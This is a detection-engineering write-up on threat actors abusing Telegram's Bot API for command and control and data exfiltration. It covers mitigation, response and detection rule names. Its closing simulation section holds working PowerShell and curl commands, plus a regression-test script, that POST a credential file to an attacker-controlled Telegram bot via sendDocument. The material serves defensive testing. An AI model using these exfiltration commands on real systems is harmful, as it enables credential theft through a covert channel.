The Detection & Response Chronicles: Exploring Telegram Abuse
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article explains how several threat actors misuse Telegram’s Bot API and channels in enterprises for command and control, data exfiltration, and victim monitoring. Malware families including DeerStealer, Lumma Stealer, Raven Stealer, and a trojanized XWorm builder hard-code bot tokens or channel IDs and call endpoints such as /sendMessage and /sendDocument. It includes Microsoft Defender and Sentinel detection queries focused on suspicious process command lines and traffic to api.telegram.org. Key guidance is to baseline legitimate Telegram use and block the API where it isn’t needed.
Investigation
NVISO’s SOC reported four intrusion attempts observed across October 2025 and March 2025 where Telegram was used at different points in the attack lifecycle. The write-up highlights campaigns such as Lunar Spider monitoring victims via fake captcha lures, DeerStealer sending operator notifications through curl, Lumma Stealer pulling C2 details from Telegram channels, Raven Stealer exfiltrating archived collections, and an XWorm builder relying on the Bot API for both exfiltration and C2. Analysts extracted indicators including process command lines, network destinations, and relevant file names.
Mitigation
Establish a baseline for legitimate Telegram usage, then block outbound access to api.telegram.org in environments where it is not required. Watch for uncommon processes (e.g., curl, powershell, wscript) initiating connections to the API and investigate any scripted Bot API interactions. Tune detections to suppress expected behavior such as known browsers launching telegram.exe, and prioritize long-polling or webhook-style requests originating from suspicious binaries or unexpected hosts.
Response
When activity is detected, isolate the affected endpoint, stop suspicious processes, and preserve command-line arguments along with DNS, proxy, and network telemetry. Perform deeper forensics to identify follow-on payloads associated with campaigns like DeerStealer or Raven Stealer. Rotate any exposed bot tokens, disable or revoke abused Telegram channels, and contain the spread by blocking related indicators. If abuse is confirmed, escalate reporting through Telegram’s official channels and document the incident for recurrence prevention.
Attack Flow
Detections
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Suspicious Defender Exclusions Modification (via cmdline)
View
Suspicious Process Utilizes a URL in the Command Line (via cmdline)
View
IOCs (Emails) to detect: The Detection & Response Chronicles: Exploring Telegram Abuse
View
Detect Non-Browser Communication with Telegram API [Windows Network Connection]
View
Detection of Malicious Telegram API Usage [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary with a compromised Windows host wishes to exfiltrate a harvested credential file (creds.txt) to a Telegram bot they control. To avoid storing a custom binary, they use the nativecurl.exe(installed via Windows 10 optional features) to POST the file tohttps://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. The command is executed from PowerShell, ensuring the process creation event records a command line that contains “api.telegram.org”. Because the process iscurl.exe, the rule’s filter (InitiatingProcessFileName: "telegram.exe") does not suppress the alert.# Variables (replace with attacker-controlled values) $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11" $ChatID = "987654321" $FilePath = "C:Tempcreds.txt" # Ensure the file exists (simulated credential dump) Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!" # Execute the exfiltration via Telegram Bot API $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" curl.exe -X POST -F "document=@$FilePath" $Url -
Regression Test Script: The script below reproduces the exact steps, suitable for automated BAS runs.
#-------------------------------------------- # Regression Test – Telegram API Exfiltration #-------------------------------------------- param( [string]$BotToken = "REPLACE_WITH_TOKEN", [string]$ChatID = "REPLACE_WITH_CHATID", [string]$TmpDir = "$env:TEMPTelegramBAS" ) # Create temp workspace New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null # Simulated credential file $CredFile = Join-Path $TmpDir "creds.txt" "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile # Build API URL $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" # Invoke exfiltration Write-Host "[*] Exfiltrating $CredFile to Telegram..." curl.exe -X POST -F "document=@$CredFile" $Url # Simple success indicator (does not verify delivery) if ($LASTEXITCODE -eq 0) { Write-Host "[+] Exfiltration command executed." } else { Write-Error "[-] Exfiltration failed." } -
Cleanup Commands: Remove the temporary file and directory; optionally terminate any lingering
curl.exeprocesses.# Cleanup temporary artifacts Stop-Process -Name "curl" -ErrorAction SilentlyContinue Remove-Item -Path $TmpDir -Recurse -Force Write-Host "[*] Cleanup complete."